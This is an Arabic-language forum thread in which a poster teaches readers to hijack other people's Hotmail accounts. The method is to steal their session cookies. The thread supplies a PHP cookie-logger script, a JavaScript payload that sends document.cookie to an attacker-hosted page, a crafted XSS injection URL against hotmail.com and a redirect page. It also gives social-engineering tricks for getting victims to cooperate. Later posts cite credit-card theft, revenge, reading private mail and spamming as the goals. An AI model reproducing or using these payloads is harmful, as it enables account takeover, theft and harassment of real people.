مشاهدة النسخة كاملة : ازاى تخترق اميل اى واحد
Xx.Youri.xX 10-05-2006, 03:48 AM السلام عليكم
الموضوع ده مهم جدا
وخطير جدا
اولا : دى اول مره اشوف فيها الموضوع فى منتدايات عربيه
يعنى نقدر نقول حصريا على ثانويه واحنا ومطين صوتنا شويه عشان فيه منتدايات تانيه عملت حاجات تانيه زى كده .
السلام عليكم
اولا
الفكره ان انت مش هتخترق الاميل بالمعنى الواضح . لا انت هتعرف ال cookie بتاع لضحيه بس
وده من اى برنامج كوكيز تقدر تعمله fake cookie وتدخل بيه على ال hotmail.com
وكأنك انت داخل باميل الضحيه بالظبط
ازاى بقى .
اسمع كويس
طبعا كلكم ( مش كلكم قوى يعنى ) عارفين الاسكربت ده
<script>alert(****************)</SCRIPT>
ده اسكريبت اظهار الكوكيز ( ده اذا كان فيه كوكيز طبعا )
ادخل مثلا على موقع www.hotmail.com
واكتب الاسكربت ده وانتر لذيذ كده من عندك .
هتلاقى الكوكيز بتاعك
بس انت هتستفاد ايه من الكوكيز ده
ده بتاعك
انت عايز بتاع الضحيه . هوه يورى بيشتغلنا ولا ايه . ؟
ههههه
لا واللهى مبشتغلكم
انا ببدأ بالفكره الاوى
طيب احنا عايزين الضحيه هوه اللى يكتب الاسكربت ده عشان نعرف الكوكيز بتاعه
نعمل ايه ..
من هنا نبدأ الجد
فيه طريقتين
الاول وهيا اللى انا بفضلها لانها مفيهاش وجع قلب
انت تقول للضحيه ادخل هنا واعمل كده وبعدين اكتب الاسكربت ده وانتر واعمل برنت اسككرين ايوه بالظبط كده ادخل على البنت بقى اعمل باسد وبعدين هاتلى الصوره
لا هاتها jpg عشان الجحم انت فاهم
بس كده
بكده انت عرفت الكوكي بتاعه .
الف مبروك
عايزين حاجه بقى
سلام
Xx.Youri.xX 10-05-2006, 04:05 AM اه
الطريقه التانيه
مالهاش لازمه دى طريقه متعبه
انتوا حررين
احنا عايزين الاول نعمل صفحه تعمل لوج للنصوص .
كود صفحه php بيعمل لوج لاى تكيست.
<?php
*$filename = "logfile.txt";
*if (isset($_GET["cookie"]))
*{
* *if (!$handle = fopen($filename, 'a'))
* *{
* * *echo "Error: Unable to write to the log file";
* * *exit;
* *}
* *else
* *{
* * *if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
* * *{
* * * *echo "Error while writing to log file";
* * * *exit;
* * *}
* *}
* *echo "Successfully wrote a string to the log file";
* *fclose($handle);
* *exit;
*}
*echo "nothing to write to the log file";
*exit;
?>
الكود واضح ومش محتاج شرح على ما اظن
نفترض انه انت رفعته على موقعك مثلا اللينك كده
http://www.xxxxx.com/cookie_logger.php
ادخل هنا مثلا
http://www.xxxxx.com/cookie_logger.php?cookie=Youri
هتظهر لك رساله بتقول
Successfully wrote a string to the log file
وده معناه الملف شغال.
ادخل على ملف اللوج فايل هتلاقى اسمى منور هناك
هههههههههه
بس كده برده احنا معملناش حاجه
لسه محتاجين الضحيه يدخل على الصفحه دى
ازاى .
<script>location.href='http://www.xxxxx.com/cookie_logger.php?cookie='+escape(****************) </SCRIPT>
ده الاسكربت مفيش ابسط من كده . B)
احنا كده عايزين نعمل html injection
هيبقى بالاستيل ده
http://hotmail.com/?mkt=nl-nl');location.href='http://www.xxxxxx.com/cookie_logger.php?cookie='+escape(****************) ;escape('
بس كده ابعته للضحيه اللى انت عايزها
لكن الضحيه هيشوف اللينك فيه cookie هيخاف وهيعمل عبيط ومش هيضغط
لا احنا نخليه يضغط بالعافيه
ازاى.
ممكن كود تحويل حلو فى اى صفحه وتبعته عليها
او مثلا افتح الصفحه دى مع اى صفحه تبعك ك popup
ان شاله ميكون عنده بوب اب بلوكر
الكود للتحويل مثلا هيبقى كده
<?php
*header("Location: http://hotmail.com/?mkt=nl-nl');location.href='http://www.xxxxxx.com/cookie_logger.php?cookie='+escape(****************) ;escape('");
*exit;
?>
انا شرحت كل حاجه
الطريقه
الاستغلال
كيفيه الخداع
ده حتى انا كتبتلكم كل الاكواد
يعنى مش ناقص عليا حاجه غير ان انا اللى اخترق لكم الضحيه كمان
بالهنا والشفا
سلام
الشكر مش ليا
الشكر ل masmido
لانه هوه اللى فركنى بالموضوع ده فى سؤاله للعقرب هنا
http://www.thanwya.com/forums/index.php?showtopic=5109&st=20
شكرا ليكم
سلام واى استفسار انا موجود
Y O U R I
Xx.Youri.xX 10-05-2006, 04:06 AM ايه اللى جاب الرد ده فى النصف . ؟؟؟
amr_gabr 10-05-2006, 04:10 AM معلش ماخدتش بالي ان الموضوع ليه تكمله عموما وله تزعل اديني شيلت الرد الي في النص
Xx.Youri.xX 10-05-2006, 04:11 AM ايه يا عمرو واللهى انا بهزر
اهلا بيك يا عمرو فى الموضوع
بس انت مقلتش ايه رأيك .
سلام
=ivan= 10-05-2006, 10:14 AM جاااااااامد الموضوع ...
جامد بضمير...
يا ريت يتثبت عشان مفيش حد بيخش حاليا ...وعشان زى ما قلنا...الموضوع حلو
تيتونت_الباشا تلميذ 10-05-2006, 11:56 AM مشكووووووور يا يورى
akk-maddy 10-05-2006, 03:03 PM شكرا اوى يا يورى على الطريقة دى :lol:
مجهود واضح يورى
بس عندى سؤال
معلش استحملنى
ايه الهدف من اختراق الايميلات..؟؟
؟
؟
وشكرا
رومانسي بس منسي 11-05-2006, 12:25 PM مشكور يورى على الموضوع
الامير عبده 16-05-2006, 02:53 PM بجد انا مش فاهم اى حاجه خالص بصراحه
ياريت تفسر ادق
محمد البري 16-05-2006, 02:56 PM شكرا يا يوري على مجهودكــ الجبار والله بس الطريقة الاولى يا يوري تعتمد على ان الشخص اللي قدامكــ سوري يعني موش بيفهم حاجا في النت والطريقة التانيا زي ما انت قولت متعبه شويا
بس شكلنا هنعتمد على السهل وهي الطريقة الاولى حلوة برضو
بس بجد موضوع جامد يا يوري
Xx.Youri.xX 16-05-2006, 03:49 PM شكرا ليكم جميعا واسف على التأخير
ahmedation_4ever : شكرا حبيبى على الرد
تسلم .
الجزء . واى استفسار انا موجود
تيتونت_الباشا تلميذ : ثانكس حبيبى على الرد الجميل واتمنى انك تكون فهمت الموضوع كويس
akk-maddy : ههههههه شكرا حبيبى على الرد . بس انت مالك ومال الهكر
انا بسمع عنك كلام وحش قوى من اول انك احلى منى لغايه انك معمول عليك رقابه ضدد الهكر فى البيت
يا راجل سيب البيت وخد راحتك .
هههههههههه
سلام .
مهرة : اولا شكرا على مرورك الجميل نورتى الموضوع
ردا على سؤالك .
اولا . اختراق الاميل ممكن يساعدك على معرفه بيانات فيزا الشخص اللى انت اخترقته
ثانيا . اكيد انت صادفت انك اتخانقت مع اى حد على النت . وقل ادبه شويه .( مش برده لازم يتعاقب ولا تتساب كده ) وانا مش كريم يا عم .
ثالثا . اهم حاجه فى الاختراق لما تكون قاصد الاميل ده بالذات عشان تختره ( وده لذه فى حد ذاتها انك تصمم على حاجه وتعلمها ده) عشان تتابع الرسائل بتاعته وتستفاد انت منها مثلا اشتراكاته فى المنتدى ( ممكن تخترق اى منتدى بالطريقه دى ) باسوردات المواقع بتاعته . وحاجات تانيه كتير .
رابعا . ارسال رسائل عن طريق الاميل ده لمجموعه من الاشخاص بهدف اى حاجه ( ممكن تنفع فى الدعايه جامد بس لازم تكون مقنع شويه )
كفايه انا تعبت لو عايز اسباب تانيه انا جاهز
رومانسي بس منسي : الرد صغير وانا مبحبش الردود دى بس انا هرد بس عشان حاجه واحده . الكلمه اللى انت كاتبها تحت اسمك دى .
مليش فى البنات .
مشكور يا رومانسى على الرد الجميل ;)
الامير عبده . اكتر من كده ! ! ! ! ! ! ! !
اوكى يا باشا انت تأمر .
ان شاء الله بكره هكون جاهز باسهل شرح فى الدنيا .
محمد البري . شكرااا حبيبى على الرد الجميل
اى خدمه .
Youri__Any Time Any Wer .
ابن الليل 17-05-2006, 01:01 PM مشكورر مشكورر
Xx.Youri.xX 17-05-2006, 06:19 PM ثانكس ثانكس
البروفسور 22-05-2006, 12:12 PM اولا انا ديه اول مشاركة ليه في المنتدى ده واتمنى اكون معاكم على طول واشاركم افكاري بس في توضيح بسيط لحضرتك ممكن؟؟ اكيد ممكن باين عليك راجل كريم :unsure: اولا الرابط الاولاني خالص بتاع الكوكيز لو في الياهو انسخه والصقه في انهي مكان في الموقع ولما يجيني الكوكيز بتاع الضحيه اعمل ايه ياريت ترد عليا في اقرب فرصة
البروفسور 22-05-2006, 12:17 PM وفي ممكن اخد رايك في حاجة انا كنت عايز ادخل على المواقع الي هي لازم تدخلها برقم معين مثل 07770001 وانا عندي dsl هل في برنامج او طريقة تحل المشكله ديه
Xx.Youri.xX 22-05-2006, 12:18 PM مفيش رد اسرع من كده بقى
هههههههههه
بس يا مان .
الرابط ده هتنسخه وتلصقه فى الaddress bar
اوكى .
هتظهر رساله هيا دى الكوكيز
سلام .
Xx.Youri.xX 22-05-2006, 12:20 PM مجربتش واللهى بس انا هحاول اشوفلك حل .
اهه
ممكن لو الموقع مشهور شويه هتلاقيه عامل لينك تانى . للى هيدخل عليه من اى بى بره مصر
او ممكن يكون بيطلب الرقم بس من مصر
هاتلى اسم الموقع وانا هشوفلك حل فيه اوكى.
سلام .
البروفسور 23-05-2006, 03:40 PM معلش انا عارف انك حتقول عليا غبي بس مش مهم رقم واحد الادرس بار هو الي بنكتب فيه الموقع ونكتب الجمله ديه بعد كتابه اسم الموقع ولا بعد الدخول على ايميلي وهل تنفع في الياهو والموقع الي بقولك عليه اسمه www.mooga.com
معلش تعبتك معايا وشكرا على الرد الي اسرع من الطيارة
Xx.Youri.xX 23-05-2006, 07:56 PM هههههه وادى رد تانى اسرع من اى حاجه انت ممكن تقول عليها
بعد الدخول على الموقع والتسجيل
اكتب الكود ده مكان العنوان بتاع الموقع اوكى
سلام
.
|